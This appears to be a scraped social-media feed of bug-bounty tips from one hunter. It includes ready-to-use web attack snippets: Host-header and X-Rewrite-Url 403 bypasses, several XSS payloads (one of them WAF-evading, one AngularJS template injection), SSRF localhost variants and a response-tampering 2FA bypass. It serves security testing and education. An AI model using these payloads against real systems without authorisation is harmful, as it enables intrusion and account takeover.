TRIcKymAn_Vß @_tricky_man_vs
nothing toooo say......🤗 Joined September 2020
Request
GET /admin
Host: test.com
Response
403 Forbidden
You can bypass 403 just by changing host domain to 127.0.0.1
Request
GET /admin
Host: 127.0.0.1
Response
200 OK
#bugbounty #bugbountytip
Hakrawler Version 2 is out:- Much simpler Much faster Much more reliable Less bugs (hopefully none) Simple output for easier tool chaining Less features No banner No colours github.com/hakluke/hakraw…
*Simple list of bugs for testing* #bugbounty #bugbountytips #websecurity [+] Cache Poisoning [+] Cash Overflow [+] Clickjacking [+] Command injection attacks [+] Comment Injection Attack [+] Content Security Policy [+] Content Spoofing [+] Credential stuffing
A really comprehensive API security testing mind-map! Great work @dsopas <3 dsopas.github.io/MindAPI/play/
Without ">" (XSS) <svg onload='alert(1)' <svg onload="alert(1)" <svg onload=alert(1)// <svg onload=alert(1)+ <svg onload=alert(1)<!-- <opening_tag>PAYLOAD</closing_tag>
X-Rewrite-Url header can be used to bypass WordPress 403 pages.
POST /xmlrpc HTTP/1.1
Host: target.com
X-Rewrite-Url: xmlrpc.php
X-Rewrite-Url: wp-json/v2/users
X-Rewrite-Url: wp-login.php
Happy Hacking ! #bugbounty #bugbountytip #bugbountytips
Found ssrf? Try these for more impact:
1. To access localhost~
http://127.0.0.1:port
http://localhost:port
https://127.0.0.1:port
https://localhost:port
http://[::]:port
http://0000::1:port
http://[0:0:0:0:0:ffff:127.0.0.1]
http://0/
http://127.1
http://127.0.1
In case you missed my talk at @AhmOwasp, here's the link to Slides, MindMap & Git Repo. Slides: speakerdeck.com/harshbothra/go… MindMap: xmind.net/m/2FwJ7D GitHub Repo: github.com/harsh-bothra/l… #bugbountytips #appsec #infosec
an AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29, thanks to @garethheyes {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} #bugbounty #bugbountytips #cybersecurity
Selected a program; 1st attempt = 3.5k$ After few months 2nd attempt = 7.5k$ After few months (Bypassed the fixes + New feature bugs) 3rd attempt = 10k$ Come back with 🔥
Testing for 2FA bypass?
Your response code: 302, 400, 403 etc.
Tamper it with 200 OK
Add following context response
{"success":"true"}
Or verified
#kongsec
A solid XSS payload that bypasses Imperva WAF 😄 <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click #infosec #bugbountytips
Secret keys finder github.com/momenbasel/key…
Subdomain takeover and DNS zone transfer with simple oneliner tools. Full writeup: cysek.org/post/subdomain… Thanks for inspiring guys, One day I wanna be like you. @ofjaaah @ADITYASHENDE17 @NahamSec #bugbountytips #bugbounty #Pentesting
Selected a program; 1st week = 0 bugs 2nd week = 2+ bugs 3rd week = 50+ bugs 4th week = 100% triaged Rewarded for 50+ bugs Dig deep until you find 💎
Morning with this notification made my day😍😍 Thanks @ADITYASHENDE17 Bhai for follow back! You are true Inspiration🥳🔥
There's a lot of decisions made around bug bounty scopes, and how they're defined. Let's discuss! 👉youtu.be/OsIXSuVO8ig
All About Bug Bounty:- All about bug websites (bypasses, payloads, and etc) github.com/daffainfo/AllA…
